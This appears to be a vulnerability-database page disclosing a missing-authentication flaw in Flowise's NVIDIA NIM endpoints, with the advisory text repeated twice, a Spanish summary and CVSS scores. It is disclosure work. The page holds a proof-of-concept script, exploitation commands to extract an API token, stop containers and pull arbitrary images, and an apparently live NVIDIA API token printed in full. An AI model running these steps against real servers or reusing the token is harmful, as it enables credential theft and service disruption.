Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, the NVIDIA NIM router…
GitHub_M·CWE-306·Published 2026-03-06
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, the NVIDIA NIM router (/api/v1/nvidia-nim/*) is whitelisted in the global authentication middleware, allowing unauthenticated access to privileged container management and token generation endpoints. This issue has been patched in version 3.0.13.
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, the NVIDIA NIM router (/api/v1/nvidia-nim/*) is whitelisted in the global authentication middleware, allowing unauthenticated access to privileged container management and token generation endpoints. This issue has been patched in version 3.0.13.
# Missing Authentication on NVIDIA NIM Endpoints ## Summary The NVIDIA NIM router (`/api/v1/nvidia-nim/*`) is whitelisted in the global authentication middleware, allowing unauthenticated access to privileged container management and token generation endpoints. ## Vulnerability Details | Field | Value | |-------|-------| | CWE | CWE-306: Missing Authentication for Critical Function | | Affected File | `packages/server/src/utils/constants.ts` | | Affected Line | Line 20 (`'/api/v1/nvidia-nim'` in `WHITELIST_URLS`) | | CVSS 3.1 | 8.6 (High) | ## Root Cause In `packages/server/src/utils/constants.ts`, the NVIDIA NIM route is added to the authentication whitelist: ```typescript export const WHITELIST_URLS = [ // ... other URLs '/api/v1/nvidia-nim', // Line 20 - bypasses JWT/API-key validation // ... ] ``` This causes the global auth middleware to skip authentication checks for all endpoints under `/api/v1/nvidia-nim/*`. None of the controller actions in `packages/server/src/controllers/nvidia-nim/index.ts` perform their own authentication checks. ## Affected Endpoints | Method | Endpoint | Risk | |--------|----------|------| | GET | `/api/v1/nvidia-nim/get-token` | Leaks valid NVIDIA API token | | GET | `/api/v1/nvidia-nim/preload` | Resource consumption | | GET | `/api/v1/nvidia-nim/download-installer` | Resource consumption | | GET | `/api/v1/nvidia-nim/list-running-containers` | Information disclosure | | POST | `/api/v1/nvidia-nim/pull-image` | Arbitrary image pull | | POST | `/api/v1/nvidia-nim/start-container` | Arbitrary container start | | POST | `/api/v1/nvidia-nim/stop-container` | Denial of Service | | POST | `/api/v1/nvidia-nim/get-image` | Information disclosure | | POST | `/api/v1/nvidia-nim/get-container` | Information disclosure | ## Impact ### 1. NVIDIA API Token Leakage The `/get-token` endpoint returns a valid NVIDIA API token without authentication. This token grants access to NVIDIA's inference API and can list 170+ LLM models. **Token obtained:** ```json { "access_token": "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", "token_type": "Bearer", "expires_in": 3600 } ``` **Token validation:** ```bash curl -H "Authorization: Bearer nvapi-GT-..." https://integrate.api.nvidia.com/v1/models # Returns list of 170+ available models ``` ### 2. Container Runtime Manipulation On systems with Docker/NIM installed, an unauthenticated attacker can: - List running containers (reconnaissance) - Stop containers (Denial of Service) - Start containers with arbitrary images - Pull arbitrary Docker images (resource consumption, potential malicious images) ## Proof of Concept ### poc.py ```python #!/usr/bin/env python3 """ POC: Privileged NVIDIA NIM endpoints are unauthenticated Usage: python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token """ import argparse import urllib.request import urllib.error def main(): ap = argparse.ArgumentParser() ap.add_argument("--target", required=True, help="Base URL, e.g. http://host:port") ap.add_argument("--path", required=True, help="NIM endpoint path") ap.add_argument("--method", default="GET", choices=["GET", "POST"]) ap.add_argument("--data", default="", help="Raw request body for POST") args = ap.parse_args() url = args.target.rstrip("/") + "/" + args.path.lstrip("/") body = args.data.encode("utf-8") if args.method == "POST" else None req = urllib.request.Request( url, data=body, method=args.method, headers={"Content-Type": "application/json"} if body else {}, ) try: with urllib.request.urlopen(req, timeout=10) as r: print(r.read().decode("utf-8", errors="replace")) except urllib.error.HTTPError as e: print(e.read().decode("utf-8", errors="replace")) if __name__ == "__main__": main() ``` <img width="1581" height="595" alt="screenshot" src="https://github.com/user-attachments/assets/85351a88-64ce-4e2c-8e67-98f217fcf989" /> ### Exploitation Steps ```bash # 1. Obtain NVIDIA API token (no authentication required) python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token # 2. List running containers python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/list-running-containers # 3. Stop a container (DoS) python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/stop-container \ --method POST --data '{"containerId":"<target_id>"}' # 4. Pull arbitrary image python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/pull-image \ --method POST --data '{"imageTag":"malicious/image","apiKey":"any"}' ``` ### Evidence **Token retrieval without authentication:** ``` $ python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token {"access_token":"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","token_type":"Bearer","refresh_token":null,"expires_in":3600,"id_token":null} ``` **Token grants access to NVIDIA API:** ``` $ curl -H "Authorization: Bearer nvapi-GT-..." https://integrate.api.nvidia.com/v1/models {"object":"list","data":[{"id":"01-ai/yi-large",...},{"id":"meta/llama-3.1-405b-instruct",...},...]} ``` **Container endpoints return 500 (not 401) proving auth bypass:** ``` $ python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/list-running-containers {"statusCode":500,"success":false,"message":"Container runtime client not available","stack":{}} ``` ## References - [CWE-306: Missing Authentication for Critical Function](https://cwe.mitre.org/data/definitions/306.html) - [OWASP API Security Top 10 - API2:2023 Broken Authentication](https://owasp.org/API-Security/editions/2023/en/0xa2-broken-authentication/)
# Missing Authentication on NVIDIA NIM Endpoints ## Summary The NVIDIA NIM router (`/api/v1/nvidia-nim/*`) is whitelisted in the global authentication middleware, allowing unauthenticated access to privileged container management and token generation endpoints. ## Vulnerability Details | Field | Value | |-------|-------| | CWE | CWE-306: Missing Authentication for Critical Function | | Affected File | `packages/server/src/utils/constants.ts` | | Affected Line | Line 20 (`'/api/v1/nvidia-nim'` in `WHITELIST_URLS`) | | CVSS 3.1 | 8.6 (High) | ## Root Cause In `packages/server/src/utils/constants.ts`, the NVIDIA NIM route is added to the authentication whitelist: ```typescript export const WHITELIST_URLS = [ // ... other URLs '/api/v1/nvidia-nim', // Line 20 - bypasses JWT/API-key validation // ... ] ``` This causes the global auth middleware to skip authentication checks for all endpoints under `/api/v1/nvidia-nim/*`. None of the controller actions in `packages/server/src/controllers/nvidia-nim/index.ts` perform their own authentication checks. ## Affected Endpoints | Method | Endpoint | Risk | |--------|----------|------| | GET | `/api/v1/nvidia-nim/get-token` | Leaks valid NVIDIA API token | | GET | `/api/v1/nvidia-nim/preload` | Resource consumption | | GET | `/api/v1/nvidia-nim/download-installer` | Resource consumption | | GET | `/api/v1/nvidia-nim/list-running-containers` | Information disclosure | | POST | `/api/v1/nvidia-nim/pull-image` | Arbitrary image pull | | POST | `/api/v1/nvidia-nim/start-container` | Arbitrary container start | | POST | `/api/v1/nvidia-nim/stop-container` | Denial of Service | | POST | `/api/v1/nvidia-nim/get-image` | Information disclosure | | POST | `/api/v1/nvidia-nim/get-container` | Information disclosure | ## Impact ### 1. NVIDIA API Token Leakage The `/get-token` endpoint returns a valid NVIDIA API token without authentication. This token grants access to NVIDIA's inference API and can list 170+ LLM models. **Token obtained:** ```json { "access_token": "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", "token_type": "Bearer", "expires_in": 3600 } ``` **Token validation:** ```bash curl -H "Authorization: Bearer nvapi-GT-..." https://integrate.api.nvidia.com/v1/models # Returns list of 170+ available models ``` ### 2. Container Runtime Manipulation On systems with Docker/NIM installed, an unauthenticated attacker can: - List running containers (reconnaissance) - Stop containers (Denial of Service) - Start containers with arbitrary images - Pull arbitrary Docker images (resource consumption, potential malicious images) ## Proof of Concept ### poc.py ```python #!/usr/bin/env python3 """ POC: Privileged NVIDIA NIM endpoints are unauthenticated Usage: python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token """ import argparse import urllib.request import urllib.error def main(): ap = argparse.ArgumentParser() ap.add_argument("--target", required=True, help="Base URL, e.g. http://host:port") ap.add_argument("--path", required=True, help="NIM endpoint path") ap.add_argument("--method", default="GET", choices=["GET", "POST"]) ap.add_argument("--data", default="", help="Raw request body for POST") args = ap.parse_args() url = args.target.rstrip("/") + "/" + args.path.lstrip("/") body = args.data.encode("utf-8") if args.method == "POST" else None req = urllib.request.Request( url, data=body, method=args.method, headers={"Content-Type": "application/json"} if body else {}, ) try: with urllib.request.urlopen(req, timeout=10) as r: print(r.read().decode("utf-8", errors="replace")) except urllib.error.HTTPError as e: print(e.read().decode("utf-8", errors="replace")) if __name__ == "__main__": main() ``` <img width="1581" height="595" alt="screenshot" src="https://github.com/user-attachments/assets/85351a88-64ce-4e2c-8e67-98f217fcf989" /> ### Exploitation Steps ```bash # 1. Obtain NVIDIA API token (no authentication required) python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token # 2. List running containers python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/list-running-containers # 3. Stop a container (DoS) python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/stop-container \ --method POST --data '{"containerId":"<target_id>"}' # 4. Pull arbitrary image python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/pull-image \ --method POST --data '{"imageTag":"malicious/image","apiKey":"any"}' ``` ### Evidence **Token retrieval without authentication:** ``` $ python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/get-token {"access_token":"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","token_type":"Bearer","refresh_token":null,"expires_in":3600,"id_token":null} ``` **Token grants access to NVIDIA API:** ``` $ curl -H "Authorization: Bearer nvapi-GT-..." https://integrate.api.nvidia.com/v1/models {"object":"list","data":[{"id":"01-ai/yi-large",...},{"id":"meta/llama-3.1-405b-instruct",...},...]} ``` **Container endpoints return 500 (not 401) proving auth bypass:** ``` $ python poc.py --target http://127.0.0.1:3000 --path /api/v1/nvidia-nim/list-running-containers {"statusCode":500,"success":false,"message":"Container runtime client not available","stack":{}} ``` ## References - [CWE-306: Missing Authentication for Critical Function](https://cwe.mitre.org/data/definitions/306.html) - [OWASP API Security Top 10 - API2:2023 Broken Authentication](https://owasp.org/API-Security/editions/2023/en/0xa2-broken-authentication/)
Flowise es una interfaz de usuario de arrastrar y soltar para construir un flujo de modelo de lenguaje grande personalizado. Antes de la versión 3.0.13, el router NVIDIA NIM (/API/v1/nvidia-nim/*) está en la lista blanca en el middleware de autenticación global, permitiendo acceso no autenticado a la gestión privilegiada de contenedores y a los puntos finales de generación de tokens. Este problema ha sido parcheado en la versión 3.0.13.
| Version | Type | Source | Base | Exp | Impact | Vector |
|---|---|---|---|---|---|---|
| 3.1 | Primary | NVD | 9.8 | 3.9 | 5.9 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| 4.0 | Primary | cve.org | 7.7 | — | — | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N |
| 4.0 | Primary | cve.org | 7.7 | — | — | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N |
| 4.0 | Secondary | NVD | 7.7 | — | — | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X |
| 4.0 | Secondary | GHSA | 7.7 | — | — | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N |